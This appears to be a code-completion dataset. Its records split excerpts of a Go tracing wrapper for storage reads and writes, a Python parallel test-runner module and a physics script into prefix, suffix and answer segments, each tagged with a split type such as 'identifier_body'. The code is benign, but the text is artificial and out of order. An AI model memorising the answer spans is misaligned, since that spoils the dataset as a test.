func (w *writable) Finish() error {
w.g.flush()
return w.w.Finish()
}
// Abort is part of the objstorage.Writable interface.
func (w *writable) Abort() {
w.g.flush()
w.w.Abort()
}
// WrapReadable wraps an objstorage.Readable with one that generates tracing
// events.
func (t *Tracer) WrapReadable(
ctx context.Context, r objstorage.Readable, fileNum base.FileNum,
) objstorage.Readable {
res := &readable{
r: r,
fileNum: fileNum,
}
res.mu.g = makeEventGenerator(ctx, t)
return res
}
type readable struct {
r objstorage.Readable
fileNum base.FileNum
mu struct {
sync.Mutex
g eventGenerator
}
}
var _ objstorage.Readable = (*readable)(nil)
// ReadAt is part of the objstorage.Readable interface.
func (r *readable) ReadAt(ctx context.Context, v []byte, off int64) (n int, err error) {
r.mu.Lock()
r.mu.g.add(ctx, Event{
Op: ReadOp,
FileNum: r.fileNum,
Offset: off,
Size: int64(len(v)),
})
r.mu.Unlock()
return r.r.ReadAt(ctx, v, off)
}
// Close is part of the objstorage.Readable interface.
func (r *readable) Close() error
|
// Size is part of the objstorage.Readable interface.
func (r *readable) Size() int64 {
return r.r.Size()
}
// NewReadHandle is part of the objstorage.Readable interface.
func (r *readable) NewReadHandle(ctx context.Context) objstorage.ReadHandle {
// It's safe to get the tracer from the generator without the mutex since it never changes.
t := r.mu.g.t
return &readHandle{
rh: r.r.NewReadHandle(ctx),
fileNum: r.fileNum,
handleID: t.handleID.Add(1),
g: makeEventGenerator(ctx, t),
}
}
type readHandle struct {
rh objstorage.ReadHandle
fileNum base.FileNum
handleID uint64
g eventGenerator
}
var _ objstorage.ReadHandle = (*readHandle)(nil)
// ReadAt is part of the objstorage.ReadHandle interface.
func (rh *readHandle) ReadAt(ctx context.Context, p []byte, off int64) (n int, err error) {
rh.g.add(ctx, Event{
Op: ReadOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: off,
Size: int64(len(p)),
})
return rh.rh.ReadAt(ctx, p, off)
}
// Close is part of the objstorage.ReadHandle interface.
func (rh *readHandle) Close() error {
rh.g.flush()
return rh.rh.Close()
}
// SetupForCompaction is part of the objstorage.ReadHandle interface.
func (rh *readHandle) SetupForCompaction() {
rh.g.add(context.Background(), Event{
Op: SetupForCompactionOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
})
rh.rh.SetupForCompaction()
}
// RecordCacheHit is part of the objstorage.ReadHandle interface.
func (rh *readHandle) RecordCacheHit(ctx context.Context, offset, size int64) {
rh.g.add(ctx, Event{
Op: RecordCacheHitOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: offset,
Size: size,
})
rh.rh.RecordCacheHit(ctx, offset, size)
}
type ctxInfo struct {
reason Reason
blockType BlockType
levelPlusOne uint8
}
func mergeCtxInfo(base, other ctxInfo) ctxInfo {
res := other
if res.reason == 0 {
res.reason = base.reason
}
if res.blockType == 0 {
res.blockType = base.blockType
}
if res.levelPlusOne == 0 {
res.levelPlusOne = base.levelPlusOne
}
return res
}
type ctxInfoKey struct{}
func withInfo(ctx context.Context, info ctxInfo) context.Context {
return context.WithValue(ctx, ctxInfoKey{}, info)
}
func infoFromCtx(ctx context.Context) ctxInfo {
res := ctx.Value(ctxInfoKey{})
if res == nil {
return ctxInfo{}
}
return res.(ctxInfo)
}
// WithReason creates a context that has an associated Reason (which ends up in
// traces created under that context).
func WithReason(ctx context.Context, reason Reason) context.Context {
info := infoFromCtx(ctx)
info.reason = reason
return withInfo(ctx, info)
}
// WithBlockType creates a context that has an associated BlockType (which ends up in
// traces created under that context).
func WithBlockType(ctx context.Context, blockType BlockType) context.Context {
info := infoFromCtx(ctx)
info.blockType = blockType
return withInfo(ctx, info)
}
// WithLevel creates a context that has an associated level (which ends up in
// traces created under that context).
func WithLevel(ctx context.Context, level int) context.Context {
info := infoFromCtx(ctx)
info.levelPlusOne = uint8(level) + 1
return withInfo(ctx, info)
}
const (
eventSize = int(unsafe.Sizeof(Event{}))
targetEntriesPerFile = 256 * 1024 * 1024 / eventSize // 256MB files
eventsPerBuf = 16
channelBufSize = 512 * 1024 / eventsPerBuf // 512K events.
bytesPerFileSync = 128 * 1024
)
type eventBuf struct {
events [eventsPerBuf]Event
num int
}
type eventGenerator struct {
t *Tracer
baseCtxInfo ctxInfo
buf eventBuf
}
func makeEventGenerator(ctx context.Context, t *Tracer) eventGenerator {
return eventGenerator{
t: t,
baseCtxInfo: infoFromCtx(ctx),
}
}
func (g *eventGenerator) flush() {
if g.buf.num > 0 {
g.t.workerDataCh <- g.buf
g.buf.num = 0
}
}
func (g *eventGenerator) add(ctx context.Context, e Event) {
e.StartUnixNano = time.Now().UnixNano()
info := infoFromCtx(ctx)
info = mergeCtxInfo(g.baseCtxInfo, info)
e.Reason = info.reason
e.Block
|
{
r.mu.g.flush()
return r.r.Close()
}
|
identifier_body
|
process.py
|
err = ''
sys.__stdout__.write("({}) {} {}".format(os.getpid(), msg, err)+'\n')
sys.__stdout__.flush()
class ProcessLogger(object):
"""
I am used by LoggingDaemonlessPool to get crash output out to the logger,
instead of having process crashes be silent
"""
def __init__(self, callable):
self.__callable = callable
def __call__(self, *args, **kwargs):
try:
result = self.__callable(*args, **kwargs)
except Exception:
# Here we add some debugging help. If multiprocessing's
# debugging is on, it will arrange to log the traceback
logger = multiprocessing.get_logger()
if not logger.handlers:
logger.addHandler(logging.StreamHandler())
logger.error(traceback.format_exc())
logger.handlers[0].flush()
# Re-raise the original exception so the Pool worker can
# clean up
raise
# It was fine, give a normal answer
return result
class DaemonlessProcess(multiprocessing.Process):
"""
I am used by LoggingDaemonlessPool to make pool workers NOT run in
daemon mode (daemon mode process can't launch their own subprocesses)
"""
def _get_daemon(self):
return False
def _set_daemon(self, value):
pass
# 'daemon' attribute needs to always return False
daemon = property(_get_daemon, _set_daemon)
class LoggingDaemonlessPool(Pool):
"""
I use ProcessLogger and DaemonlessProcess to make a pool of workers.
"""
Process = DaemonlessProcess
def apply_async(self, func, args=(), kwds={}, callback=None):
return Pool.apply_async(
self, ProcessLogger(func), args, kwds, callback)
# -------------------------------------------------------------------------
# START of Worker Finalization Monkey Patching
#
# I started with code from cpython/Lib/multiprocessing/pool.py from version
# 3.5.0a4+ of the main python mercurial repository. Then altered it to run
# on 2.7+ and added the finalizer/finalargs parameter handling.
_wrap_exception = True
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None, finalizer=None,
finalargs=()):
|
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number, for use
after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=worker,
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild,
self._wrap_exception,
self._finalizer,
self._finalargs)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
util.debug('added worker')
import platform
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.pool import MaybeEncodingError
except: # pragma: no cover
# Python 2.7.4 introduced this class. If we're on Python 2.7.0 to 2.7.3
# then we'll have to define it ourselves. :-/
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __str__(self):
return "Error sending result: '%s'. Reason: '%s'" % (self.value,
self.exc)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
# Python 2 and 3 raise a different error when they exit
if platform.python_version_tuple()[0] == '2': # pragma: no cover
PortableOSError = IOError
else: # pragma: no cover
PortableOSError = OSError
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, finalizer=None, finalargs=()): # pragma: no cover
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
try:
initializer(*initargs)
except InitializerOrFinalizerError as e:
print(str(e))
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, PortableOSError):
util.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
util.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
util.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
completed += 1
if finalizer:
try:
finalizer(*finalargs)
except InitializerOrFinalizerError as e:
print(str(e))
util.debug('worker exiting after %d tasks' % completed)
# Unmodified (see above)
class RemoteTraceback(Exception): # pragma: no cover
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
# Unmodified (see above)
class ExceptionWithTraceback: # pragma: no cover
def __init__(self, exc, tb):
tb = traceback.format_exception(type(exc), exc, tb)
tb = ''.join(tb)
self.exc = exc
self.tb = '\n"""\n%s"""' % tb
def __reduce__(self):
return rebuild_exc, (self.exc, self.tb)
# Unmodified (see above)
def rebuild_exc(exc, tb): # pragma: no cover
exc.__cause__ = RemoteTraceback(tb)
return exc
multiprocessing.pool.worker = worker
# END of Worker Finalization Monkey Patching
# -----------------------------------------------------------------------------
def poolRunner(target, queue, coverage_number=None, omit_patterns=[]): # pragma: no cover
"""
I am the function that pool worker processes run. I run one unit test.
"""
# Each pool worker gets his own temp directory, to avoid having tests that
# are used to taking turns using the same temp file name from interfering
# with eachother. So long as the test doesn't use a hard-coded temp
# directory, anyway.
saved_tempdir = tempfile.tempdir
tempfile.tempdir = tempfile.mkdtemp()
def cleanup():
# Restore the state of the temp directory
if sys.version_info[0] == 2: # pragma: no cover
shutil.rmtree(tempfile.tempdir, ignore_errors=True)
tempfile.tempdir = saved_tempdir
queue.put(None)
# Finish coverage
if coverage_number and coverage:
cov.stop()
cov.save()
# Each pool starts its own coverage, later combined by the main process.
if coverage_number and coverage:
cov = coverage.coverage(
data_file='.coverage.{}_{}'.format(
coverage_number, random.randint(0, 10000)),
omit=omit_patterns)
cov._warn_no_data = False
cov.start()
# What to do each time an individual test is started
already_sent = set()
def start_callback(test):
# Let the main process know what test we are starting
test = proto_test(test)
if test not in already_sent:
queue.put(test)
already_sent.add(test)
def finalize_callback(test_result):
# Let the main process know what happened with the test run
queue.put(test_result)
result = ProtoTestResult(start_callback, finalize_callback)
test = None
try:
test = loadTargets(target)
except:
err = sys.exc_info()
t = ProtoTest()
t.module = 'green.loader'
t.class_name = 'N/A'
t.description = 'Green encountered an error loading the unit test.'
t.method_name = 'poolRunner'
result.startTest(t)
result.addError(t, err)
result.stopTest(t)
queue.put(result)
cleanup()
return
if getattr(test, 'run', False):
# Loading was successful, lets do this
try:
test.run
|
self._finalizer = finalizer
self._finalargs = finalargs
super(LoggingDaemonlessPool, self).__init__(processes, initializer,
initargs, maxtasksperchild)
|
identifier_body
|
process.py
|
err = ''
sys.__stdout__.write("({}) {} {}".format(os.getpid(), msg, err)+'\n')
sys.__stdout__.flush()
class ProcessLogger(object):
"""
I am used by LoggingDaemonlessPool to get crash output out to the logger,
instead of having process crashes be silent
"""
def __init__(self, callable):
self.__callable = callable
def __call__(self, *args, **kwargs):
try:
result = self.__callable(*args, **kwargs)
except Exception:
# Here we add some debugging help. If multiprocessing's
# debugging is on, it will arrange to log the traceback
logger = multiprocessing.get_logger()
if not logger.handlers:
logger.addHandler(logging.StreamHandler())
logger.error(traceback.format_exc())
logger.handlers[0].flush()
# Re-raise the original exception so the Pool worker can
# clean up
raise
# It was fine, give a normal answer
return result
class DaemonlessProcess(multiprocessing.Process):
"""
I am used by LoggingDaemonlessPool to make pool workers NOT run in
daemon mode (daemon mode process can't launch their own subprocesses)
"""
def _get_daemon(self):
return False
def _set_daemon(self, value):
pass
# 'daemon' attribute needs to always return False
daemon = property(_get_daemon, _set_daemon)
class LoggingDaemonlessPool(Pool):
"""
I use ProcessLogger and DaemonlessProcess to make a pool of workers.
"""
Process = DaemonlessProcess
def apply_async(self, func, args=(), kwds={}, callback=None):
return Pool.apply_async(
self, ProcessLogger(func), args, kwds, callback)
# -------------------------------------------------------------------------
# START of Worker Finalization Monkey Patching
#
# I started with code from cpython/Lib/multiprocessing/pool.py from version
# 3.5.0a4+ of the main python mercurial repository. Then altered it to run
# on 2.7+ and added the finalizer/finalargs parameter handling.
_wrap_exception = True
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None, finalizer=None,
finalargs=()):
self._finalizer = finalizer
self._finalargs = finalargs
super(LoggingDaemonlessPool, self).__init__(processes, initializer,
initargs, maxtasksperchild)
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number, for use
after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=worker,
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild,
self._wrap_exception,
self._finalizer,
self._finalargs)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
util.debug('added worker')
import platform
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.pool import MaybeEncodingError
except: # pragma: no cover
# Python 2.7.4 introduced this class. If we're on Python 2.7.0 to 2.7.3
# then we'll have to define it ourselves. :-/
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __str__(self):
return "Error sending result: '%s'. Reason: '%s'" % (self.value,
self.exc)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
# Python 2 and 3 raise a different error when they exit
if platform.python_version_tuple()[0] == '2': # pragma: no cover
PortableOSError = IOError
else: # pragma: no cover
PortableOSError = OSError
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, finalizer=None, finalargs=()): # pragma: no cover
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
try:
initializer(*initargs)
except InitializerOrFinalizerError as e:
print(str(e))
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, PortableOSError):
util.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
util.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
util.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
completed += 1
if finalizer:
try:
finalizer(*finalargs)
except InitializerOrFinalizerError as e:
print(str(e))
util.debug('worker exiting after %d tasks' % completed)
# Unmodified (see above)
class
|
(Exception): # pragma: no cover
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
# Unmodified (see above)
class ExceptionWithTraceback: # pragma: no cover
def __init__(self, exc, tb):
tb = traceback.format_exception(type(exc), exc, tb)
tb = ''.join(tb)
self.exc = exc
self.tb = '\n"""\n%s"""' % tb
def __reduce__(self):
return rebuild_exc, (self.exc, self.tb)
# Unmodified (see above)
def rebuild_exc(exc, tb): # pragma: no cover
exc.__cause__ = RemoteTraceback(tb)
return exc
multiprocessing.pool.worker = worker
# END of Worker Finalization Monkey Patching
# -----------------------------------------------------------------------------
def poolRunner(target, queue, coverage_number=None, omit_patterns=[]): # pragma: no cover
"""
I am the function that pool worker processes run. I run one unit test.
"""
# Each pool worker gets his own temp directory, to avoid having tests that
# are used to taking turns using the same temp file name from interfering
# with eachother. So long as the test doesn't use a hard-coded temp
# directory, anyway.
saved_tempdir = tempfile.tempdir
tempfile.tempdir = tempfile.mkdtemp()
def cleanup():
# Restore the state of the temp directory
if sys.version_info[0] == 2: # pragma: no cover
shutil.rmtree(tempfile.tempdir, ignore_errors=True)
tempfile.tempdir = saved_tempdir
queue.put(None)
# Finish coverage
if coverage_number and coverage:
cov.stop()
cov.save()
# Each pool starts its own coverage, later combined by the main process.
if coverage_number and coverage:
cov = coverage.coverage(
data_file='.coverage.{}_{}'.format(
coverage_number, random.randint(0, 10000)),
omit=omit_patterns)
cov._warn_no_data = False
cov.start()
# What to do each time an individual test is started
already_sent = set()
def start_callback(test):
# Let the main process know what test we are starting
test = proto_test(test)
if test not in already_sent:
queue.put(test)
already_sent.add(test)
def finalize_callback(test_result):
# Let the main process know what happened with the test run
queue.put(test_result)
result = ProtoTestResult(start_callback, finalize_callback)
test = None
try:
test = loadTargets(target)
except:
err = sys.exc_info()
t = ProtoTest()
t.module = 'green.loader'
t.class_name = 'N/A'
t.description = 'Green encountered an error loading the unit test.'
t.method_name = 'poolRunner'
result.startTest(t)
result.addError(t, err)
result.stopTest(t)
queue.put(result)
cleanup()
return
if getattr(test, 'run', False):
# Loading was successful, lets do this
try:
test.run
|
RemoteTraceback
|
identifier_name
|
process.py
|
err = ''
sys.__stdout__.write("({}) {} {}".format(os.getpid(), msg, err)+'\n')
sys.__stdout__.flush()
class ProcessLogger(object):
"""
I am used by LoggingDaemonlessPool to get crash output out to the logger,
instead of having process crashes be silent
"""
def __init__(self, callable):
self.__callable = callable
def __call__(self, *args, **kwargs):
try:
result = self.__callable(*args, **kwargs)
except Exception:
# Here we add some debugging help. If multiprocessing's
# debugging is on, it will arrange to log the traceback
logger = multiprocessing.get_logger()
if not logger.handlers:
logger.addHandler(logging.StreamHandler())
logger.error(traceback.format_exc())
logger.handlers[0].flush()
# Re-raise the original exception so the Pool worker can
# clean up
raise
# It was fine, give a normal answer
return result
class DaemonlessProcess(multiprocessing.Process):
"""
I am used by LoggingDaemonlessPool to make pool workers NOT run in
daemon mode (daemon mode process can't launch their own subprocesses)
"""
def _get_daemon(self):
return False
def _set_daemon(self, value):
pass
# 'daemon' attribute needs to always return False
daemon = property(_get_daemon, _set_daemon)
class LoggingDaemonlessPool(Pool):
"""
I use ProcessLogger and DaemonlessProcess to make a pool of workers.
"""
Process = DaemonlessProcess
def apply_async(self, func, args=(), kwds={}, callback=None):
return Pool.apply_async(
self, ProcessLogger(func), args, kwds, callback)
# -------------------------------------------------------------------------
# START of Worker Finalization Monkey Patching
#
# I started with code from cpython/Lib/multiprocessing/pool.py from version
# 3.5.0a4+ of the main python mercurial repository. Then altered it to run
# on 2.7+ and added the finalizer/finalargs parameter handling.
_wrap_exception = True
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None, finalizer=None,
finalargs=()):
self._finalizer = finalizer
self._finalargs = finalargs
super(LoggingDaemonlessPool, self).__init__(processes, initializer,
initargs, maxtasksperchild)
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number, for use
after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=worker,
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild,
self._wrap_exception,
self._finalizer,
self._finalargs)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
util.debug('added worker')
import platform
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.pool import MaybeEncodingError
except: # pragma: no cover
# Python 2.7.4 introduced this class. If we're on Python 2.7.0 to 2.7.3
# then we'll have to define it ourselves. :-/
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __str__(self):
return "Error sending result: '%s'. Reason: '%s'" % (self.value,
self.exc)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
# Python 2 and 3 raise a different error when they exit
if platform.python_version_tuple()[0] == '2': # pragma: no cover
PortableOSError = IOError
else: # pragma: no cover
PortableOSError = OSError
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, finalizer=None, finalargs=()): # pragma: no cover
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
try:
initializer(*initargs)
except InitializerOrFinalizerError as e:
print(str(e))
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, PortableOSError):
util.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
util.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
util.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
completed += 1
if finalizer:
try:
finalizer(*finalargs)
except InitializerOrFinalizerError as e:
print(str(e))
util.debug('worker exiting after %d tasks' % completed)
# Unmodified (see above)
class RemoteTraceback(Exception): # pragma: no cover
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
# Unmodified (see above)
class ExceptionWithTraceback: # pragma: no cover
def __init__(self, exc, tb):
|
self.exc = exc
self.tb = '\n"""\n%s"""' % tb
def __reduce__(self):
return rebuild_exc, (self.exc, self.tb)
# Unmodified (see above)
def rebuild_exc(exc, tb): # pragma: no cover
exc.__cause__ = RemoteTraceback(tb)
return exc
multiprocessing.pool.worker = worker
# END of Worker Finalization Monkey Patching
# -----------------------------------------------------------------------------
def poolRunner(target, queue, coverage_number=None, omit_patterns=[]): # pragma: no cover
"""
I am the function that pool worker processes run. I run one unit test.
"""
# Each pool worker gets his own temp directory, to avoid having tests that
# are used to taking turns using the same temp file name from interfering
# with eachother. So long as the test doesn't use a hard-coded temp
# directory, anyway.
saved_tempdir = tempfile.tempdir
tempfile.tempdir = tempfile.mkdtemp()
def cleanup():
# Restore the state of the temp directory
if sys.version_info[0] == 2: # pragma: no cover
shutil.rmtree(tempfile.tempdir, ignore_errors=True)
tempfile.tempdir = saved_tempdir
queue.put(None)
# Finish coverage
if coverage_number and coverage:
cov.stop()
cov.save()
# Each pool starts its own coverage, later combined by the main process.
if coverage_number and coverage:
cov = coverage.coverage(
data_file='.coverage.{}_{}'.format(
coverage_number, random.randint(0, 10000)),
omit=omit_patterns)
cov._warn_no_data = False
cov.start()
# What to do each time an individual test is started
already_sent = set()
def start_callback(test):
# Let the main process know what test we are starting
test = proto_test(test)
if test not in already_sent:
queue.put(test)
already_sent.add(test)
def finalize_callback(test_result):
# Let the main process know what happened with the test run
queue.put(test_result)
result = ProtoTestResult(start_callback, finalize_callback)
test = None
try:
test = loadTargets(target)
except:
err = sys.exc_info()
t = ProtoTest()
t.module = 'green.loader'
t.class_name = 'N/A'
t.description = 'Green encountered an error loading the unit test.'
t.method_name = 'poolRunner'
result.startTest(t)
result.addError(t, err)
result.stopTest(t)
queue.put(result)
cleanup()
return
if getattr(test, 'run', False):
# Loading was successful, lets do this
try:
test.run(result
|
tb = traceback.format_exception(type(exc), exc, tb)
tb = ''.join(tb)
|
random_line_split
|
process.py
|
# Re-raise the original exception so the Pool worker can
# clean up
raise
# It was fine, give a normal answer
return result
class DaemonlessProcess(multiprocessing.Process):
"""
I am used by LoggingDaemonlessPool to make pool workers NOT run in
daemon mode (daemon mode process can't launch their own subprocesses)
"""
def _get_daemon(self):
return False
def _set_daemon(self, value):
pass
# 'daemon' attribute needs to always return False
daemon = property(_get_daemon, _set_daemon)
class LoggingDaemonlessPool(Pool):
"""
I use ProcessLogger and DaemonlessProcess to make a pool of workers.
"""
Process = DaemonlessProcess
def apply_async(self, func, args=(), kwds={}, callback=None):
return Pool.apply_async(
self, ProcessLogger(func), args, kwds, callback)
# -------------------------------------------------------------------------
# START of Worker Finalization Monkey Patching
#
# I started with code from cpython/Lib/multiprocessing/pool.py from version
# 3.5.0a4+ of the main python mercurial repository. Then altered it to run
# on 2.7+ and added the finalizer/finalargs parameter handling.
_wrap_exception = True
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None, finalizer=None,
finalargs=()):
self._finalizer = finalizer
self._finalargs = finalargs
super(LoggingDaemonlessPool, self).__init__(processes, initializer,
initargs, maxtasksperchild)
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number, for use
after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=worker,
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild,
self._wrap_exception,
self._finalizer,
self._finalargs)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
util.debug('added worker')
import platform
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.pool import MaybeEncodingError
except: # pragma: no cover
# Python 2.7.4 introduced this class. If we're on Python 2.7.0 to 2.7.3
# then we'll have to define it ourselves. :-/
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __str__(self):
return "Error sending result: '%s'. Reason: '%s'" % (self.value,
self.exc)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
# Python 2 and 3 raise a different error when they exit
if platform.python_version_tuple()[0] == '2': # pragma: no cover
PortableOSError = IOError
else: # pragma: no cover
PortableOSError = OSError
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, finalizer=None, finalargs=()): # pragma: no cover
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
try:
initializer(*initargs)
except InitializerOrFinalizerError as e:
print(str(e))
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, PortableOSError):
util.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
util.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
util.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
completed += 1
if finalizer:
try:
finalizer(*finalargs)
except InitializerOrFinalizerError as e:
print(str(e))
util.debug('worker exiting after %d tasks' % completed)
# Unmodified (see above)
class RemoteTraceback(Exception): # pragma: no cover
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
# Unmodified (see above)
class ExceptionWithTraceback: # pragma: no cover
def __init__(self, exc, tb):
tb = traceback.format_exception(type(exc), exc, tb)
tb = ''.join(tb)
self.exc = exc
self.tb = '\n"""\n%s"""' % tb
def __reduce__(self):
return rebuild_exc, (self.exc, self.tb)
# Unmodified (see above)
def rebuild_exc(exc, tb): # pragma: no cover
exc.__cause__ = RemoteTraceback(tb)
return exc
multiprocessing.pool.worker = worker
# END of Worker Finalization Monkey Patching
# -----------------------------------------------------------------------------
def poolRunner(target, queue, coverage_number=None, omit_patterns=[]): # pragma: no cover
"""
I am the function that pool worker processes run. I run one unit test.
"""
# Each pool worker gets his own temp directory, to avoid having tests that
# are used to taking turns using the same temp file name from interfering
# with eachother. So long as the test doesn't use a hard-coded temp
# directory, anyway.
saved_tempdir = tempfile.tempdir
tempfile.tempdir = tempfile.mkdtemp()
def cleanup():
# Restore the state of the temp directory
if sys.version_info[0] == 2: # pragma: no cover
shutil.rmtree(tempfile.tempdir, ignore_errors=True)
tempfile.tempdir = saved_tempdir
queue.put(None)
# Finish coverage
if coverage_number and coverage:
cov.stop()
cov.save()
# Each pool starts its own coverage, later combined by the main process.
if coverage_number and coverage:
cov = coverage.coverage(
data_file='.coverage.{}_{}'.format(
coverage_number, random.randint(0, 10000)),
omit=omit_patterns)
cov._warn_no_data = False
cov.start()
# What to do each time an individual test is started
already_sent = set()
def start_callback(test):
# Let the main process know what test we are starting
test = proto_test(test)
if test not in already_sent:
queue.put(test)
already_sent.add(test)
def finalize_callback(test_result):
# Let the main process know what happened with the test run
queue.put(test_result)
result = ProtoTestResult(start_callback, finalize_callback)
test = None
try:
test = loadTargets(target)
except:
err = sys.exc_info()
t = ProtoTest()
t.module = 'green.loader'
t.class_name = 'N/A'
t.description = 'Green encountered an error loading the unit test.'
t.method_name = 'poolRunner'
result.startTest(t)
result.addError(t, err)
result.stopTest(t)
queue.put(result)
cleanup()
return
if getattr(test, 'run', False):
# Loading was successful, lets do this
|
try:
test.run(result)
# If your class setUpClass(self) method crashes, the test doesn't
# raise an exception, but it does add an entry to errors. Some
# other things add entries to errors as well, but they all call the
# finalize callback.
if result and (not result.finalize_callback_called) and getattr(result, 'errors', False):
queue.put(test)
queue.put(result)
except:
# Some frameworks like testtools record the error AND THEN let it
# through to crash things. So we only need to manufacture another
# error if the underlying framework didn't, but either way we don't
# want to crash.
if result.errors:
queue.put(result)
else:
err = sys.exc_info()
result.startTest(test)
result.addError(test, err)
|
conditional_block
|
|
disp_surf_calc.py
|
np.conj(e_x) + e_y * np.conj(e_y))
e_tot = np.sqrt(e_x * np.conj(e_x) + e_y * np.conj(e_y) + e_z ** 2)
e_pol = -2 * np.imag(e_x * np.conj(e_y)) / e_per ** 2
return e_x, e_y, e_z, e_per, e_tot, e_pol
def _calc_b(kc_x_mat, kc_z_mat, w_final, e_x, e_y, e_z):
